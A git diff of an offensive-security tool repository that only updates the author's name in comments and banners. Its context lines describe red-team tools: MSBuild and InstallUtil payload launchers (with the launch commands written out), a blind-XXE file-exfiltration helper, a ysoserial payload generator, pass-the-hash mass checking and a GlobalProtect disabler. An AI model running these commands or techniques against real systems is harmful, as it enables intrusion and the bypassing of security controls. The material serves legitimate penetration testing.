' Mariusz B. / mgeeky, <mb@binary-offensive.com>
' Mariusz Banach / mgeeky, <mb@binary-offensive.com>
' (https://github.com/mgeeky)
'

6
red-teaming/generateMSBuildXML.py
View File

@ -12,7 +12,7 @@
# - raw Shellcode in a separate thread via CreateThread
# - .NET Assembly via Assembly.Load
#
# Mariusz B. / mgeeky, <mb@binary-offensive.com>
# Mariusz Banach / mgeeky, <mb@binary-offensive.com>
#
import re
@ -479,7 +479,7 @@ def getInlineTask(module, payload, _format, apc, targetProcess):
<!-- Based on Casey Smith work, Twitter: @subTee -->
<!-- Automatically generated using `generateMSBuildXML.py` utility -->
<!-- by Mariusz B. / mgeeky <mb@binary-offensive.com> -->
<!-- by Mariusz Banach / mgeeky <mb@binary-offensive.com> -->
<Target Name="$taskName">
<$templateName />
@ -584,7 +584,7 @@ def main(argv):
sys.stderr.write('''
:: Powershell via MSBuild inline-task XML payload generation script
To be used during Red-Team assignments to launch Powershell payloads without using 'powershell.exe'
Mariusz B. / mgeeky, <mb@binary-offensive.com>
Mariusz Banach / mgeeky, <mb@binary-offensive.com>
''')
if len(argv) < 2:

2
red-teaming/markOwnedNodesInNeo4j.py
View File

@ -7,7 +7,7 @@
# script you can quickly instruct Neo4j to mark that principals as owned, which will enrich your
# future use of BloodHound.
#
# Mariusz B. / mgeeky
# Mariusz Banach / mgeeky
#
import sys

2
red-teaming/msbuild-powershell-msgbox.xml
View File

@ -3,7 +3,7 @@
<!-- Based on Casey Smith work (https://gist.github.com/subTee/ca477b4d19c885bec05ce238cbad6371), Twitter: @subTee -->
<!-- To be launched like so: cmd> %WINDIR%\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe task1.xml -->
<!-- Modified by Mariusz B. / mgeeky. -->
<!-- Modified by Mariusz Banach / mgeeky. -->
<Target Name="MyLittleInlineTaskName">
<MyLittleInlineTask />

4
red-teaming/rogue-dot-net/README.md
View File

@ -23,7 +23,7 @@ python3 generateRogueDotNet.py --help
:: Rogue .NET Source Code Generation Utility
To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil.
Mariusz B. / mgeeky, <mb@binary-offensive.com>
Mariusz Banach / mgeeky, <mb@binary-offensive.com>
usage: .\generateRogueDotNet.py [options] <inputFile>
@ -43,7 +43,7 @@ python3 generateRogueDotNet.py -r notepad64.bin > program.cs
:: Rogue .NET Source Code Generation Utility
To be used during Red-Team assignments to launch Powershell/Shellcode payloads via Regsvcs/Regasm/InstallUtil.
Mariusz B. / mgeeky, <mb@binary-offensive.com>
Mariusz Banach / mgeeky, <mb@binary-offensive.com>
[?] File specified as raw Shellcode.

6
red-teaming/rogue-dot-net/generateRogueDotNet.py
View File

@ -34,7 +34,7 @@
# cmd> %WINDIR%\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
# cmd> %WINDIR%\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /logtoconsole=false /U rogue.dll
#
# Mariusz B. / mgeeky, <mb@binary-offensive.com>
# Mariusz Banach / mgeeky, <mb@binary-offensive.com>
#
import re
@ -519,7 +519,7 @@ def getSourceFileContents(
/*
Author: Casey Smith, Twitter: @subTee
Customized by: Mariusz B. / mgeeky, <mb@binary-offensive.com>
Customized by: Mariusz Banach / mgeeky, <mb@binary-offensive.com>
License: BSD 3-Clause
Step 1: Create Your Strong Name Key -> key.snk
@ -806,7 +806,7 @@ def main(argv):
sys.stderr.write('''
:: Rogue .NET Source Code Generation Utility
Comes with a few hardcoded C# code templates and an easy wrapper around csc.exe compiler
Mariusz B. / mgeeky, <mb@binary-offensive.com>
Mariusz Banach / mgeeky, <mb@binary-offensive.com>
''')
if len(argv) < 2:

4
web/blindxxe.py
View File

@ -31,7 +31,7 @@
# mysql:x:101:65534:Linux User,,,:/home/mysql:/bin/false
#
#
# Mariusz B., 2016
# Mariusz Banach, 2016
#
@ -132,7 +132,7 @@ def parseOptions(argv):
print('''
:: Blind-XXE attacker's helper backend component
Helps exfiltrate files by abusing out-of-bands XML External Entity vulnerabilities.
Mariusz B. / mgeeky '16-18, <mb@binary-offensive.com>
Mariusz Banach / mgeeky '16-18, <mb@binary-offensive.com>
''')
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options] <file>')

4
web/padding-oracle-tests.py
View File

@ -1,7 +1,7 @@
#!/usr/bin/python
#
# Padding Oracle test-cases generator.
# Mariusz B. / mgeeky, 2016
# Mariusz Banach / mgeeky, 2016
# v0.2
#
# Simple utility that aids the penetration tester when manually testing Padding Oracle condition
@ -277,7 +277,7 @@ def hex_dump(data):
def main():
info('\n\tPadding Oracle test-cases generator')
info('\tMariusz B. / mgeeky, 2016\n')
info('\tMariusz Banach / mgeeky, 2016\n')
if len(sys.argv) < 2:
warning('usage: padding-oracle-tests.py <data> [blocksize]')

2
web/post.php
View File

@ -14,7 +14,7 @@
* to add forced redirection to the target site.
*
* Authors:
* Mariusz B. / mgeeky
* Mariusz Banach / mgeeky
* Jakub M. / unkn0w
*
* Version:

2
web/py-collaborator/README.md
View File

@ -80,7 +80,7 @@ hostname|23:55|~/dev/py-collaborator # python3.7 py-collaborator-server.py -d
:: Cracking the Lens pingback responding server
Responds to every Out-of-band request correlating them along the way
Mariusz B. / mgeeky '16-18, <mb@binary-offensive.com>
Mariusz Banach / mgeeky '16-18, <mb@binary-offensive.com>
[-] You shall specify all needed MySQL connection data either via program options or config file.
[+] Database initialized.

2
web/py-collaborator/py-collaborator-server.py
View File

@ -211,7 +211,7 @@ def parseOptions(argv):
print('''
:: Cracking the Lens pingback responding server
Responds to every Out-of-band request correlating them along the way
Mariusz B. / mgeeky '16-18, <mb@binary-offensive.com>
Mariusz Banach / mgeeky '16-18, <mb@binary-offensive.com>
''')
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options]')

2
web/reencode.py
View File

@ -18,7 +18,7 @@
# - jwt
# - anytree
#
# Mariusz B., 2018
# Mariusz Banach, 2018
#
import os

6
web/ysoserial-generator.py
View File

@ -26,7 +26,7 @@
# $ ./ysoserial-generator.py -u -b -y ~/tools/ysoserial/ysoserial.jar -s --lhost 192.168.56.1:8000
# :: ysoserial payloads generation helper
# Helps generate many variations of payloads to try against vulnerable application.
# Mariusz B. / mgeeky '18, <mb@binary-offensive.com>
# Mariusz Banach / mgeeky '18, <mb@binary-offensive.com>
# v0.1
#
# [+] Command within payload:
@ -55,7 +55,7 @@
#
#
# Author:
# Mariusz B., '18-19 / <mb@binary-offensive.com>
# Mariusz Banach, '18-19 / <mb@binary-offensive.com>
#
import os
@ -379,7 +379,7 @@ def parseOptions(argv):
print('''
:: ysoserial payloads generation helper
Helps generate many variations of payloads to try against vulnerable application.
Mariusz B. / mgeeky '18, <mb@binary-offensive.com>
Mariusz Banach / mgeeky '18, <mb@binary-offensive.com>
v{}
'''.format(VERSION))

2
windows/GlobalProtectDisable.cpp
View File

@ -12,7 +12,7 @@
* Compilation:
* C:> g++ GlobalProtectDisable.cpp -o GlobalProtectDisable.exe -static -static-libgcc -static-libstdc++
*
* Mariusz B. / mgeeky, '18-'20
* Mariusz Banach / mgeeky, '18-'20
**/
#include "windows.h"

4
windows/README.md
View File

@ -13,7 +13,7 @@
```
:: findSymbols.py - Finds PE Import/Exports based on supplied filters.
Mariusz B. / mgeeky, '21
Mariusz Banach / mgeeky, '21
<mb [at] binary-offensive.com>
usage: .\findSymbols.py [options] <path>
@ -117,7 +117,7 @@ PS> python3 rdpFileUpload.py -v -f certutil README.md
Takes an input file/folder and retypes it into focused RDP session window.
That effectively uploads the file into remote host over a RDP channel.
Mariusz B. / mgeeky '20, (@mariuszbit)
Mariusz Banach / mgeeky '20, (@mariuszbit)
<mb@binary-offensive.com>
[+] Will upload file's contents: "README.md"

4
windows/findSymbols.py
View File

@ -9,7 +9,7 @@
# - module matching name
# - module NOT matching name
#
# Mariusz B. / mgeeky, '21
# Mariusz Banach / mgeeky, '21
# <mb [at] binary-offensive.com>
#
@ -436,7 +436,7 @@ def main():
out('''
:: findSymbols.py - Finds PE Import/Exports based on supplied filters.
Mariusz B. / mgeeky, '21
Mariusz Banach / mgeeky, '21
<mb [at] binary-offensive.com>
''')

4
windows/pth-carpet.py
View File

@ -23,7 +23,7 @@
# $ ./pth-carpet.py machines.txt pwdump
#
# coded by:
# Mariusz B., 2016 / mgeeky
# Mariusz Banach, 2016 / mgeeky
# version 0.2
#
# Should be working on Windows boxes as well as on Linux ones.
@ -172,7 +172,7 @@ def worker(stopevent, pwdump, machine):
def main():
global OPTIONS
print(colored('\n\tPass-The-Hash Carpet Bombing utility\n\tSmall utility trying every provided hash against every specified machine.\n\tMariusz B., 2016\n', 'white', attrs=['bold']))
print(colored('\n\tPass-The-Hash Carpet Bombing utility\n\tSmall utility trying every provided hash against every specified machine.\n\tMariusz Banach, 2016\n', 'white', attrs=['bold']))
parser = argparse.ArgumentParser(add_help = True, description='Pass-The-Hash mass checking tool')
parser.add_argument('rhosts', nargs='?', help='Specifies input file containing list of machines or CIDR notation of hosts')

4
windows/rdpFileUpload.py
View File

@ -21,7 +21,7 @@
# - tqdm
#
# Author:
# Mariusz B. / mgeeky (@mariuszbit), '20
# Mariusz Banach / mgeeky (@mariuszbit), '20
# <mb [at] binary-offensive.com>
#
@ -313,7 +313,7 @@ def parseOptions(argv):
Takes an input file/folder and retypes it into focused RDP session window.
That effectively uploads the file into remote host over a RDP channel.
Mariusz B. / mgeeky '20, (@mariuszbit)
Mariusz Banach / mgeeky '20, (@mariuszbit)
<mb@binary-offensive.com>
''')